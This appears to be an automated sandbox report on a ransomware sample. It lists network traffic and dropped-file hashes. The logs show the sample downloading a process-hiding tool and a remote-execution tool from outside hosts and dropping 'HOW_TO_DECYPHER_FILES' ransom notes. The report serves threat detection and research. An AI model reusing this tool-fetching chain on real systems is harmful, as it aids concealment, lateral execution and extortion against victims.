DNS 73.31.126.40.in-addr.arpa
Remote address: 8.8.8.8:53
Request
73.31.126.40.in-addr.arpa IN PTR
Response
• flag-us
DNS 58.55.71.13.in-addr.arpa
Remote address: 8.8.8.8:53
Request
58.55.71.13.in-addr.arpa IN PTR
Response
• flag-us
DNS 255.0.127.10.in-addr.arpa
Remote address: 8.8.8.8:53
Request
255.0.127.10.in-addr.arpa IN PTR
Response
• flag-us
DNS 255.0.127.10.in-addr.arpa
Remote address: 8.8.8.8:53
Request
255.0.127.10.in-addr.arpa IN PTR
• flag-us
DNS cutewallpaper.org
mshta.exe
Remote address: 8.8.8.8:53
Request
cutewallpaper.org IN A
Response
cutewallpaper.org IN A 172.67.211.67
cutewallpaper.org IN A 104.21.37.179
• flag-us
GET https://cutewallpaper.org/21/skull-wallpaper-free/Skull-Wallpaper-3D-Wallpapers-Latest.jpg
mshta.exe
Remote address: 172.67.211.67:443
Request
GET /21/skull-wallpaper-free/Skull-Wallpaper-3D-Wallpapers-Latest.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: cutewallpaper.org
Connection: Keep-Alive
Response
HTTP/1.1 404 Not Found
Date: Sun, 30 Jun 2024 11:04:48 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
CDN-PullZone: 2200815
CDN-Uid: 30062147-3877-4bcb-8666-933136e5ed15
CDN-RequestCountryCode: FR
Cache-Control: public, max-age=3600
CDN-StorageServer: DE-383
CDN-ProxyVer: 1.04
CDN-RequestPullSuccess: True
CDN-RequestPullCode: 404
CDN-CachedAt: 06/30/2024 11:04:48
CDN-EdgeStorageId: 1072
CDN-Status: 404
CDN-RequestId: d6858bcc027bf29ce2efab727dd5f2d2
CDN-Cache: EXPIRED
CF-Cache-Status: EXPIRED
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=boNMYSmpjRkLeN50GHvvB57IHocF9%2B3jJi11wVYQIFJ2pvXKZb7aFtDC4ijwlMRkJx%2FCiUuW4plaNisrKresfdXPng6RL1tt45xcOscHNo3svU4wBeJJI6I1Gpuaz%2FHkQd1NJw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 89bdad786f25531a-LHR
Content-Encoding: gzip
alt-svc: h3=":443"; ma=86400
• flag-us
DNS c.pki.goog
mshta.exe
Remote address: 8.8.8.8:53
Request
c.pki.goog IN A
Response
c.pki.goog IN CNAME pki-goog.l.google.com
pki-goog.l.google.com IN A 172.217.169.67
• flag-gb
GET http://c.pki.goog/r/gsr1.crl
mshta.exe
Remote address: 172.217.169.67:80
Request
GET /r/gsr1.crl HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/10.0
Host: c.pki.goog
Response
HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/cacerts
Cross-Origin-Resource-Policy: cross-origin
Cross-Origin-Opener-Policy: same-origin; report-to="cacerts"
Report-To: {"group":"cacerts","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/cacerts"}]}
Content-Length: 1739
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 0
Date: Sun, 30 Jun 2024 10:59:40 GMT
Expires: Sun, 30 Jun 2024 11:49:40 GMT
Cache-Control: public, max-age=3000
Age: 308
Last-Modified: Mon, 08 Apr 2024 07:48:00 GMT
Content-Type: application/pkix-crl
Vary: Accept-Encoding
• flag-gb
GET http://c.pki.goog/r/r4.crl
mshta.exe
Remote address: 172.217.169.67:80
Request
GET /r/r4.crl HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/10.0
Host: c.pki.goog
Response
HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/cacerts
Cross-Origin-Resource-Policy: cross-origin
Cross-Origin-Opener-Policy: same-origin; report-to="cacerts"
                                                                                                                                                                          Report-To: {"group":"cacerts","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/cacerts"}]}
                                                                                                                                                                          Content-Length: 436
                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                          Server: sffe
                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                          Date: Sun, 30 Jun 2024 10:59:40 GMT
                                                                                                                                                                          Expires: Sun, 30 Jun 2024 11:49:40 GMT
                                                                                                                                                                          Cache-Control: public, max-age=3000
                                                                                                                                                                          Age: 308
                                                                                                                                                                          Last-Modified: Wed, 01 Nov 2023 07:48:00 GMT
                                                                                                                                                                          Content-Type: application/pkix-crl
                                                                                                                                                                          Vary: Accept-Encoding
• (US) DNS 67.211.67.172.in-addr.arpa
  Remote address: 8.8.8.8:53
  Request
  67.211.67.172.in-addr.arpa IN PTR
  Response
• (US) DNS 67.169.217.172.in-addr.arpa
  Remote address: 8.8.8.8:53
  Request
  67.169.217.172.in-addr.arpa IN PTR
  Response
  67.169.217.172.in-addr.arpa IN PTR lhr48s09-in-f3.1e100.net
• (US) DNS 209.205.72.20.in-addr.arpa
  Remote address: 8.8.8.8:53
  Request
  209.205.72.20.in-addr.arpa IN PTR
  Response
• (US) DNS 103.169.127.40.in-addr.arpa
  Remote address: 8.8.8.8:53
  Request
  103.169.127.40.in-addr.arpa IN PTR
  Response
• (US) DNS 171.39.242.20.in-addr.arpa
  Remote address: 8.8.8.8:53
  Request
  171.39.242.20.in-addr.arpa IN PTR
  Response
• (US) DNS 107.12.20.2.in-addr.arpa
  Remote address: 8.8.8.8:53
  Request
  107.12.20.2.in-addr.arpa IN PTR
  Response
  107.12.20.2.in-addr.arpa IN PTR a2-20-12-107.deploy.static.akamaitechnologies.com
• (US) DNS 29.243.111.52.in-addr.arpa
  Remote address: 8.8.8.8:53
  Request
  29.243.111.52.in-addr.arpa IN PTR
  Response
• 185.199.109.133:443
  https://raw.githubusercontent.com/d35ha/ProcessHide/master/bins/ProcessHide64.exe
  tls, http | c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe | 3.2kB | 152.3kB | 61 | 115
  HTTP Request: GET https://raw.githubusercontent.com/d35ha/ProcessHide/master/bins/ProcessHide64.exe
  HTTP Response: 200
• 142.250.187.196:443
  https://www.google.com/
  tls, http | c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe | 1.6kB | 61.8kB | 28 | 48
  HTTP Request: GET https://www.google.com/
  HTTP Response: 200
• 52.1.55.52:443
  https://www.poweradmin.com/paexec/paexec.exe
  tls, http | c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe | 5.1kB | 235.9kB | 100 | 172
  HTTP Request: GET https://www.poweradmin.com/paexec/paexec.exe
  HTTP Response: 200
• 172.67.211.67:443
  https://cutewallpaper.org/21/skull-wallpaper-free/Skull-Wallpaper-3D-Wallpapers-Latest.jpg
  tls, http | mshta.exe | 1.4kB | 5.3kB | 15 | 12
  HTTP Request: GET https://cutewallpaper.org/21/skull-wallpaper-free/Skull-Wallpaper-3D-Wallpapers-Latest.jpg
  HTTP Response: 404
• 172.217.169.67:80
  http://c.pki.goog/r/r4.crl
  http | mshta.exe | 602 B | 3.9kB | 8 | 6
  HTTP Request: GET http://c.pki.goog/r/gsr1.crl
  HTTP Response: 200
  HTTP Request: GET http://c.pki.goog/r/r4.crl
  HTTP Response: 200
• 8.8.8.8:53
  raw.githubusercontent.com
  dns | c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe | 71 B | 135 B | 1 | 1
  DNS Request: raw.githubusercontent.com
  DNS Response: 185.199.109.133, 185.199.108.133, 185.199.111.133, 185.199.110.133
• 8.8.8.8:53
  133.109.199.185.in-addr.arpa
  dns | 74 B | 118 B | 1 | 1
  DNS Request: 133.109.199.185.in-addr.arpa
• 8.8.8.8:53
  www.google.com
                                                                                                                                                                          dns
                                                                                                                                                                          c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
                                                                                                                                                                          60 B
                                                                                                                                                                          76 B
                                                                                                                                                                          1
                                                                                                                                                                          1

                                                                                                                                                                          DNS Request

                                                                                                                                                                          www.google.com

                                                                                                                                                                          DNS Response

                                                                                                                                                                          142.250.187.196

                                                                                                                                                                        • 8.8.8.8:53
                                                                                                                                                                          www.poweradmin.com
                                                                                                                                                                          dns
                                                                                                                                                                          c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
                                                                                                                                                                          64 B
                                                                                                                                                                          94 B
                                                                                                                                                                          1
                                                                                                                                                                          1

                                                                                                                                                                          DNS Request

                                                                                                                                                                          www.poweradmin.com

                                                                                                                                                                          DNS Response

                                                                                                                                                                          52.1.55.52

                                                                                                                                                                        • 8.8.8.8:53
                                                                                                                                                                          13.86.106.20.in-addr.arpa
                                                                                                                                                                          dns
                                                                                                                                                                          71 B
                                                                                                                                                                          157 B
                                                                                                                                                                          1
                                                                                                                                                                          1

                                                                                                                                                                          DNS Request

                                                                                                                                                                          13.86.106.20.in-addr.arpa

                                                                                                                                                                        • 8.8.8.8:53
                                                                                                                                                                          196.187.250.142.in-addr.arpa
                                                                                                                                                                          dns
                                                                                                                                                                          74 B
                                                                                                                                                                          112 B
                                                                                                                                                                          1
                                                                                                                                                                          1

                                                                                                                                                                          DNS Request

                                                                                                                                                                          196.187.250.142.in-addr.arpa

                                                                                                                                                                        • 8.8.8.8:53
                                                                                                                                                                          52.55.1.52.in-addr.arpa
                                                                                                                                                                          dns
                                                                                                                                                                          69 B
                                                                                                                                                                          121 B
                                                                                                                                                                          1
                                                                                                                                                                          1

                                                                                                                                                                          DNS Request

                                                                                                                                                                          52.55.1.52.in-addr.arpa

                                                                                                                                                                        • 8.8.8.8:53
                                                                                                                                                                          240.221.184.93.in-addr.arpa
                                                                                                                                                                          dns
                                                                                                                                                                          73 B
                                                                                                                                                                          144 B
                                                                                                                                                                          1
                                                                                                                                                                          1

                                                                                                                                                                          DNS Request

                                                                                                                                                                          240.221.184.93.in-addr.arpa

                                                                                                                                                                        • 8.8.8.8:53
                                                                                                                                                                          73.31.126.40.in-addr.arpa
                                                                                                                                                                          dns
                                                                                                                                                                          71 B
                                                                                                                                                                          157 B
                                                                                                                                                                          1
                                                                                                                                                                          1

                                                                                                                                                                          DNS Request

                                                                                                                                                                          73.31.126.40.in-addr.arpa

                                                                                                                                                                        • 8.8.8.8:53
                                                                                                                                                                          58.55.71.13.in-addr.arpa
                                                                                                                                                                          dns
                                                                                                                                                                          70 B
                                                                                                                                                                          144 B
                                                                                                                                                                          1
                                                                                                                                                                          1

                                                                                                                                                                          DNS Request

                                                                                                                                                                          58.55.71.13.in-addr.arpa

                                                                                                                                                                        • 10.127.255.255:3
                                                                                                                                                                          c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
                                                                                                                                                                          130 B
                                                                                                                                                                          1
                                                                                                                                                                        • 10.127.0.255:3
                                                                                                                                                                          c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
                                                                                                                                                                          130 B
                                                                                                                                                                          1
                                                                                                                                                                        • 8.8.8.8:53
                                                                                                                                                                          255.0.127.10.in-addr.arpa
                                                                                                                                                                          dns
                                                                                                                                                                          142 B
                                                                                                                                                                          71 B
                                                                                                                                                                          2
                                                                                                                                                                          1

                                                                                                                                                                          DNS Request

                                                                                                                                                                          255.0.127.10.in-addr.arpa

                                                                                                                                                                          DNS Request

                                                                                                                                                                          255.0.127.10.in-addr.arpa

                                                                                                                                                                        • 8.8.8.8:53
                                                                                                                                                                          cutewallpaper.org
                                                                                                                                                                          dns
                                                                                                                                                                          mshta.exe
                                                                                                                                                                          63 B
                                                                                                                                                                          95 B
                                                                                                                                                                          1
                                                                                                                                                                          1

                                                                                                                                                                          DNS Request

                                                                                                                                                                          cutewallpaper.org

                                                                                                                                                                          DNS Response

                                                                                                                                                                          172.67.211.67
                                                                                                                                                                          104.21.37.179

                                                                                                                                                                        • 8.8.8.8:53
                                                                                                                                                                          c.pki.goog
                                                                                                                                                                          dns
                                                                                                                                                                          mshta.exe
                                                                                                                                                                          56 B
                                                                                                                                                                          107 B
                                                                                                                                                                          1
                                                                                                                                                                          1

                                                                                                                                                                          DNS Request

                                                                                                                                                                          c.pki.goog

                                                                                                                                                                          DNS Response

                                                                                                                                                                          172.217.169.67

                                                                                                                                                                        • 8.8.8.8:53
                                                                                                                                                                          67.211.67.172.in-addr.arpa
                                                                                                                                                                          dns
                                                                                                                                                                          72 B
                                                                                                                                                                          134 B
                                                                                                                                                                          1
                                                                                                                                                                          1

                                                                                                                                                                          DNS Request

                                                                                                                                                                          67.211.67.172.in-addr.arpa

                                                                                                                                                                        • 8.8.8.8:53
                                                                                                                                                                          67.169.217.172.in-addr.arpa
                                                                                                                                                                          dns
                                                                                                                                                                          73 B
                                                                                                                                                                          111 B
                                                                                                                                                                          1
                                                                                                                                                                          1

                                                                                                                                                                          DNS Request

                                                                                                                                                                          67.169.217.172.in-addr.arpa

                                                                                                                                                                        • 8.8.8.8:53
                                                                                                                                                                          209.205.72.20.in-addr.arpa
                                                                                                                                                                          dns
                                                                                                                                                                          72 B
                                                                                                                                                                          158 B
                                                                                                                                                                          1
                                                                                                                                                                          1

                                                                                                                                                                          DNS Request

                                                                                                                                                                          209.205.72.20.in-addr.arpa

                                                                                                                                                                        • 8.8.8.8:53
                                                                                                                                                                          103.169.127.40.in-addr.arpa
                                                                                                                                                                          dns
                                                                                                                                                                          73 B
                                                                                                                                                                          147 B
                                                                                                                                                                          1
                                                                                                                                                                          1

  DNS Request: 103.169.127.40.in-addr.arpa

• 8.8.8.8:53  171.39.242.20.in-addr.arpa  dns  72 B sent / 158 B received  1 request / 1 response
  DNS Request: 171.39.242.20.in-addr.arpa

• 8.8.8.8:53  107.12.20.2.in-addr.arpa  dns  70 B sent / 133 B received  1 request / 1 response
  DNS Request: 107.12.20.2.in-addr.arpa

• 8.8.8.8:53  29.243.111.52.in-addr.arpa  dns  72 B sent / 158 B received  1 request / 1 response
  DNS Request: 29.243.111.52.in-addr.arpa

MITRE ATT&CK Enterprise v15

Downloads

• C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pqecgi20.v2j.ps1
  Filesize: 60B
  MD5:    d17fe0a3f47be24a6453e9ef58c94641
  SHA1:   6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

• C:\Users\Admin\AppData\Local\Temp\jv2uowbm.exe
  Filesize: 219KB
  MD5:    b1dfb4f9eb3e598d1892a3bd3a92f079
  SHA1:   0fc135b131d0bb47c9a0aaf02490701303b76d3b
  SHA256: ab50d8d707b97712178a92bbac74ccc2a5699eb41c17aa77f713ff3e568dcedb
  SHA512: 98454df86ddddf20e0b7bd19566006dbec431326e8aa57600aff460e9bec3e6489e43e95be3b252bf78a2edd5c203254508e9b55e756b680c100560664278ca2

• C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.hta
  Filesize: 1KB
  MD5:    14e76cd699ec767f3f5b0b8d49e85ebb
  SHA1:   39fc2e05450a08dcd575dec6d245790c2a30fbfe
  SHA256: 4f4907c570b70e05fff683b2e5ef653d9672aa86bf962c68f0e45e1469788429
  SHA512: 4ef670d0f2f2fd2c4bb498ecf7f79cdd9bf3f0978f5b01f6b2533c4d2d146c5f4b461eae853a17b33c7f66487a198284fa0b8103327eefe46666cc709ab0a4a1

• C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.txt
  Filesize: 446B
  MD5:    13c9b06f677e12c6951b281b98f7ae0a
  SHA1:   d52667a5f3343706b7e1cb0df1ed942746dbcc6a
  SHA256: 12044f9fc36ca7cd4728f251003e5d832077c9d3a5bad61f131c67029bb4fd94
  SHA512: c8f846a48db852a212c14ef0a6740d247b478c80374c3175d9bff2a3395f6811e7b96d4c672ae9a1de88be18ac67d3d89cafe4f98622f36d616198b1511d9b8b

• memory/4192-1-0x00007FFAE60C3000-0x00007FFAE60C5000-memory.dmp
  Filesize: 8KB

• memory/4192-0-0x0000000000140000-0x000000000015C000-memory.dmp
  Filesize: 112KB

• memory/4192-134-0x00007FFAE60C0000-0x00007FFAE6B81000-memory.dmp
  Filesize: 10.8MB

• memory/4192-2-0x00007FFAE60C0000-0x00007FFAE6B81000-memory.dmp
  Filesize: 10.8MB

• memory/4532-13-0x00007FFAE60C0000-0x00007FFAE6B81000-memory.dmp
  Filesize: 10.8MB

• memory/4532-19-0x00007FFAE60C0000-0x00007FFAE6B81000-memory.dmp
  Filesize: 10.8MB

• memory/4532-15-0x00007FFAE60C0000-0x00007FFAE6B81000-memory.dmp
  Filesize: 10.8MB

• memory/4532-14-0x00007FFAE60C0000-0x00007FFAE6B81000-memory.dmp
  Filesize: 10.8MB

• memory/4532-3-0x0000012D6E890000-0x0000012D6E8B2000-memory.dmp
  Filesize: 136KB
